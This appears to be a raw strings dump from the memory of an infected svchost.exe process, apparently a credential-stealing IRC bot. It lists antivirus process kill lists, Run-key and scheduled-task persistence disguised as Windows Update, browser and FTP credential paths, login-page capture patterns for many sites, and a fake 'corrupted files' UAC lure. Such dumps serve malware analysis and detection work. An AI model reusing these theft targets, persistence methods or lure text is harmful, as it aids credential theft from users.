n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\
:%S%S\
winlogon.exe
winlogon.exe
Aadvapi32.dll
Aadvapi32.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
svchost.exe_884_rwx_000C0000_00027000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
PSSSSSSh
PSSSSSSh
PSSVSSh
PSSVSSh
RPVSSh
RPVSSh
PSSh(
PSSh(
PSSh#
PSSh#
PSSh'
PSSh'
PSSh&
PSSh&
PSSh*
PSSh*
9p.uV
9p.uV
svchost.exe_884_rwx_000E8000_00072000:
Opera/9.00 (Windows NT 5.1; U; en)
Opera/9.00 (Windows NT 5.1; U; en)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Opera 9.4 (Windows NT 6.1; U; en)
Opera 9.4 (Windows NT 6.1; U; en)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
SbieDll.dll
SbieDll.dll
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X\%s
Software\Classes\CLSID\%s\X\%s
0xX
0xX
SB:0xX
SB:0xX
G:%s_0xX_%c:%s_v1$
G:%s_0xX_%c:%s_v1$
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
IEXPLORE.EXE
IEXPLORE.EXE
IE.HTTP
IE.HTTP
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTPS
IE.HTTPS
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
IE.AssocFile.HTM
HTTP\shell\open\command
HTTP\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Psapi.dll
Psapi.dll
%s\%s
%s\%s
Software\Adobe\Acrobat Reader\%s\Privileged
Software\Adobe\Acrobat Reader\%s\Privileged
mscoree.dll
mscoree.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
nspr4.dll
nspr4.dll
nss3.dll
nss3.dll
Urlmon.dll
Urlmon.dll
URLDownloadToFileW
URLDownloadToFileW
Netapi32.dll
Netapi32.dll
76487-640-1457236-23837
76487-640-1457236-23837
76487-337-8429955-22614
76487-337-8429955-22614
76487-644-3177037-23510
76487-644-3177037-23510
76497-640-6308873-23835
76497-640-6308873-23835
55274-640-2673064-23950
55274-640-2673064-23950
76487-640-8834005-23195
76487-640-8834005-23195
76487-640-0716662-23535
76487-640-0716662-23535
76487-644-8648466-23106
76487-644-8648466-23106
00426-293-8170032-85146
00426-293-8170032-85146
76487-341-5883812-22420
76487-341-5883812-22420
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}
snxhk.dll
snxhk.dll
comctl32.dll
comctl32.dll
ZwSetValueKey
ZwSetValueKey
ZwDeleteValueKey
ZwDeleteValueKey
SOFTWARE\%s
SOFTWARE\%s
update.microsoft.com
update.microsoft.com
microsoft.com
microsoft.com
windowsupdate.microsoft.com
windowsupdate.microsoft.com
JOIN
JOIN
PRIVMSG
PRIVMSG
.rdata
.rdata
cmd_option.%s
cmd_option.%s
/c %s
/c %s
cmd.exe
cmd.exe
msvcrt.dll
msvcrt.dll
--x-x-x-xx
--x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
%s?action=up&g=%s
%s?action=up&g=%s
xul.dll
xul.dll
<Port></Port>
<Port></Port>
<Pass></Pass>
<Pass></Pass>
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
?pid=%d
?pid=%d
?page=%d
?page=%d
?id=%u
?id=%u
%s=%u&%s=%s
%s=%u&%s=%s
%s=%s&%s=%u
%s=%s&%s=%u
&%s=%s
&%s=%s
&%s%u=
&%s%u=
&%s%hu=
&%s%hu=
&%s=_%u
&%s=_%u
%d|%s|%s|%s
%d|%s|%s|%s
.info
.info
httpget
httpget
GET /%s HTTP/1.1
GET /%s HTTP/1.1
Host: %s
Host: %s
Content-Length: %d
Content-Length: %d
Accept: %s
Accept: %s
Accept-Language: %s
Accept-Language: %s
Accept-Charset: %s
Accept-Charset: %s
Accept-Encoding: %s
Accept-Encoding: %s
User-Agent: %s
User-Agent: %s
Referer: %s
Referer: %s
Connection: %s
Connection: %s
http://
http://
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
tbb-firefox.exe
tbb-firefox.exe
%s:%hu
%s:%hu
windowsupdate
windowsupdate
SSH2_MSG_KEXINIT
SSH2_MSG_KEXINIT
SSH2_MSG_DISCONNECT
SSH2_MSG_DISCONNECT
SSH2_MSG_USERAUTH_SUCCESS
SSH2_MSG_USERAUTH_SUCCESS
http://%s%s/image.php?id=%s
http://%s%s/image.php?id=%s
TaskDialogIndirect
TaskDialogIndirect
http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
ÐxX
ÐxX
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
secur32.dll
secur32.dll
crypt32.dll
crypt32.dll
user32.dll
user32.dll
advapi32.dll
advapi32.dll
wininet.dll
wininet.dll
shell32.dll
shell32.dll
shlwapi.dll
shlwapi.dll
ole32.dll
ole32.dll
version.dll
version.dll
sfc.dll
sfc.dll
dnsapi.dll
dnsapi.dll
ws2_32.dll
ws2_32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
8"808]9|9
8"808]9|9
9%9 919<9
9%9 919<9
=(=/=6==={=
=(=/=6==={=
4 4?4^4}4
4 4?4^4}4
6o6g6r6w6
6o6g6r6w6
9 9$9(90949
9 9$9(90949
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
This pointer, %d, is aligned on %d
This pointer, %d, is aligned on %d
This pointer, %d, is not aligned on %d
This pointer, %d, is not aligned on %d
%f, %f and %f form a right-angled triangle.
%f, %f and %f form a right-angled triangle.
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
?#%X.y
?#%X.y
%S#[k
%S#[k
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
.VI3xqr
.VI3xqr
zcÁ
zcÁ
Udp?iw0
Udp?iw0
/#"%f
/#"%f
P.oUw
P.oUw
B%Su[
B%Su[
Rkka.by
Rkka.by
.dYi'
.dYi'
p.Cvq
p.Cvq
.EU{%
.EU{%
D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre><b>svchost.exe_884_rwx_00170000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>